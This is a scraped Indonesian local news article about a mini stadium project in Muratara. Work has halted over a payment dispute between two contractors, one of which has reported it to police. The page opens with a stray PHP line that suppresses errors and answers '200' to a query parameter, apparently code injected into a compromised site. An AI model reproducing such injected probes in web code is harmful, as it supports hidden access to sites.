error_reporting(0); set_time_limit(0); if ($_GET['q']=='1'){echo '200'; exit;} Pembangunan Stadion Mini Terhenti - SMI.COM

Home / MURATARA

Rabu, 2 Juni 2021 - 15:06 WIB

Pembangunan Stadion Mini Terhenti

MURATARA,SMI

Pembangunan Stadion Mini, di Kelurahan Muara Rupit, Kecamatan Ruput, saat ini terhenti lantaran adanya sengketa antara PT. Merah Putih dan Cv. Cipta Muratara, Selasa (01/06).

Tidak hanya itu, sengketa tersebut bahkan berujung adanya laporan dari pihak Deruktur CV. Cipta Muratara, Yudi Ariyansyah ke Tindak Pidana Korupsi (Tipikor) Polres Kabupaten Muratara.

Akibatnya, saat ini pengerjaan pembangunan, penimbunan lokasi gedung stadion mini terhenti secara total. Yang anggaranya melalui dana CSR perusahan PT BA Muara Enim.

Bahkan Drektur Cv. Cipta Muratara Yudi Ariyansyah, mengakui pihaknya terpaksa melakukan pemberhentian pengerjaan dan tidak ada aktivitas pekerja karna belum ada penyelesaian pembayaran atas pekerjaan yang telah pihaknya kerjakan.

Baca Juga :  DPRD dan Bupati Muratara Sepakat, Raperda APBD Anggaran 2023 Jadi Perda

“Kami sebagi pendor perusahaan PT. Merah Putih telah melakukan penimbunan pembangunan gedung stadion mini Muratara sebanyak 15.680 Meter Kubik tanah. Namun belum adanya penyeleaaian pembayaran,” kata Yudi.

Terkait hal ini sudah kami laporkan kepihak Pemerintah namun tidak adanya penyeleaaian. Sehingga kami laporkan juga kepihak Tipikor Polres Muratara.

Selain itu, kami juga memberhentikan pengerjaan serta tidak ada aktivitas pekerja baru sebelum hal ini adanya penyelesaian. “Kita tutup akitivitas pengerjaan pembangunan disini, karna pihak Pt. Merah Putih belum adanya penyelesaian,” kata dia.

Terpisah, Kabag Pembangunan Muratara, Kusrianto mengatakan dengan adanya pemberhentian tersebut, pihaknya akan melaporkan ke Provinsi Sumsel maupun Bupati Muratara.

Baca Juga :  Interpelasi di Depan Mata

“Permasalahan ini antara dua perusahaan bukan pemerintah. Namun dengan adanya penghambatan pengerjaan pembangunan ini akan kami laporkan pada Bupati dan Provinsi Sumsel,” kata dia.

Dilanjutkanya, bahwa pembangunan gor mini tersebut berupa bantuan CSR dari PT Batu Bara yang ada di Muara Enim. Dan dikerjakan oleh pihak Pt. Merah putih. “Kami harapkan permasalahan yang dilapangan dapat terselesaikan dengan baik,” ujarnya. (02zm)

Pembangunan stadion mini yang ada di wilayah ibu kota Kabupaten Muratara terhenti. (Yudi)

Share :

Baca Juga

MURATARA

Penetapan Nomor Urut Pemilihan Kepala Desa Antar Waktu Desa Karang Dapo

MURATARA

4 PERSONIL POLRES MURATARA DI PECAT

MURATARA

HDS Ajak DPRD : Bersinergi Membangun Muratara

MURATARA

Kapolres Muratara, Usai di Vaksin : Warga Rantau Jaya Terima BLT

MURATARA

Gila, Nenek 63 Tahun Di Perkosa? 

MURATARA

A.Rozak Tokoh Masyarakat Embacang Pastikan, Pasangan Syarif – Surian Akan Mendapatkan dukungan 90%

MURATARA

Hadi Subeno, Antisipasi Covid Dinkes Harus Rutin Cek Kesehatan Masyarakat

MURATARA

Lagi Asyik Bersantai Dirumah, Pelaku Curat Disergap Tim Beruang Polres Muratara